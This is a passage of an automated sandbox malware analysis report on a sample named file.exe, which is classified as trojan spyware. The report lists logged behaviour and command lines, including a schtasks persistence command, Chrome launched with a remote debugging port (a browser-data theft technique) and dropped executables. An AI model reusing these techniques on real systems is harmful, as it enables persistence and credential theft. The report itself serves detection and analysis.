Source: chrome.exe, 00000004.00000003.2170674454.00005D0000A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2202176041.00005D0000E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2202141979.00005D0000E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000003.2170674454.00005D0000A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2202176041.00005D0000E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2202208885.00005D0000E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2202141979.00005D0000E44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2201902985.00005D0000DEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000004.00000003.2170674454.00005D0000A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2202176041.00005D0000E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2202141979.00005D0000E44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2201902985.00005D0000DEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000004.00000002.2196512300.00005D00004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000004.00000002.2196356888.00005D0000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2199081728.00005D00009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2199118268.00005D00009C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2199118268.00005D00009CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000002.2199081728.00005D00009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2199118268.00005D00009C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2199118268.00005D00009CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000004.00000002.2194532517.00005D000008F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000004.00000002.2194609414.00005D00000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000004.00000002.2195278048.00005D00001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000004.00000002.2196512300.00005D00004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2198463953.00005D000080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2198398442.00005D00007D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2196512300.00005D00004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2198463953.00005D000080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2198398442.00005D00007D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000004.00000002.2199402079.00005D0000A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.2195278048.00005D00001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000004.00000002.2198967928.00005D000095C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ww.google.com/
Source: file.exe, 00000000.00000003.2206373439.0000000008338000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2200150897.00005D0000BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.2200330165.00005D0000C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.2200330165.00005D0000C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.2200330165.00005D0000C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000002.2197938816.00005D000071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2199081728.00005D00009A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000003.2171318017.00005D0000CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2196214672.00005D000041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2171391485.00005D0000CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2197643768.00005D00006D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.2198504271.00005D0000830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.2198590779.00005D0000874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2198967928.00005D000095C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2195278048.00005D00001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.2198590779.00005D0000874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2198967928.00005D000095C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2195278048.00005D00001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.2199039247.00005D0000988000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.2196678375.00005D00004F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2200150897.00005D0000BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2198043911.00005D0000748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2200150897.00005D0000BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico)
Source: chrome.exe, 00000004.00000002.2200150897.00005D0000BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icovements.
Source: chrome.exe, 00000004.00000002.2196512300.00005D00004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2199558852.00005D0000A80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2194281989.00005D000001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2195358687.00005D000020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2195358687.00005D000020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2195358687.00005D000020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2197079658.00005D00005C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2195358687.00005D000020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2171170687.00005D0000C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2200419181.00005D0000C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2196512300.00005D00004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000002.2197643768.00005D00006DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.2197643768.00005D00006DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.2197643768.00005D00006DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.2197643768.00005D00006DD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2195634012.00005D00002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E2EE0 0_3_016E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E1EC3 0_3_016E1EC3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_010051B0 8_2_010051B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_01003E20 8_2_01003E20
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 1088
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: byaebdxw ZLIB complexity 0.9945377955481397
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/7@12/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7292
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2197643768.00005D00006E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe, 00000000.00000003.2196444213.0000000008311000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2348,i,5763843533842623752,7360464993323251828,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 1088
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2348,i,5763843533842623752,7360464993323251828,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: file.exe Static file information: File size 4404224 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of byaebdxw is bigger than: 0x100000 < 0x1b8200
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_01008230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_01008230
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x43d021 should be: 0x4377d4
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: byaebdxw
Source: file.exe Static PE information: section name: ccdsmily
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016859E9 pushfd ; retf 0_3_016859EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016859A1 pushfd ; retn 0066h 0_3_016859A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AF1 push eax; ret 0_3_016E3B6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016E3AA9 push eax; ret 0_3_016E3B6A
Source: file.exe Static PE information: section name: byaebdxw entropy: 7.956149987397859
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
